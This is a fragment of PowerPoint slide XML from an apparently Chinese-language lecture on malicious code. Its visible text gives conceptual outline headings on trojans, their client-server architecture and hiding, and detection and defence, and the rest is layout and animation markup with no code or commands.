            <a:off x="1030287" y="2762251"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9369E7"/>
          </a:soli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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64557" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1108075" y="2794000"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64569" name="Rectangle 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1023937" y="3856038"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="669900"/>
          </a:soli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64570" name="Text Box 58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1839913" y="2686050"/>
            <a:ext cx="5497512" cy="579438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马的工作原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64571" name="Text Box 59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1101725" y="3887788"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64587" name="Line 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="4441825"/>
            <a:ext cx="6167437" cy="7938"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64583" name="Rectangle 71"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1028700" y="5100638"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9369E7"/>
          </a:soli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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64584" name="Text Box 72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1831976" y="3787775"/>
            <a:ext cx="5645150" cy="579438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>木马的隐藏技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64585" name="Text Box 73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1082675" y="5141913"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64588" name="Line 76"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="5686425"/>
            <a:ext cx="6167437" cy="7938"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64550" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1030287" y="1670051"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="669900"/>
          </a:soli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64551" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1836738" y="1633538"/>
            <a:ext cx="5726112" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码概述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64552" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1108075" y="1701800"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64589" name="Line 77"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="2262188"/>
            <a:ext cx="6167437" cy="7937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64600" name="Text Box 88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1827214" y="5018088"/>
            <a:ext cx="5611812" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>恶意代码检测与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>防御</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10322336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40066" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程控制木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1240067" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677863" y="1382713"/>
            <a:ext cx="7772400" cy="4722812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马体系结构：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C/S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>架构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，木马程序 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>控制端程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马程序即是服务器端程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>控制端程序作为客户端，用于攻击者远程控制被植入木马的机器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程控制木马与远程控制软件的区别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐蔽性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马被隐藏，避免被发现；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>非授权性：木马程序不经授权控制主机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240067">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="124006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40067">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_c</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="FF0000"/>
                                      </p:to>
                                    </p:animClr>
                                  </p:subTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="10" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="11" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12" presetID="2" presetClass="entr" presetSubtype="9" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_c</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="FF0000"/>
                                      </p:to>
                                    </p:animClr>
                                  </p:subTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="16" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="2" presetClass="entr" presetSubtype="9" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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1240067">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_c</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="FF0000"/>
                                      </p:to>
                                    </p:animClr>
                                  </p:subTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="22" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetID="2" presetClass="entr" presetSubtype="9" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1240067">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
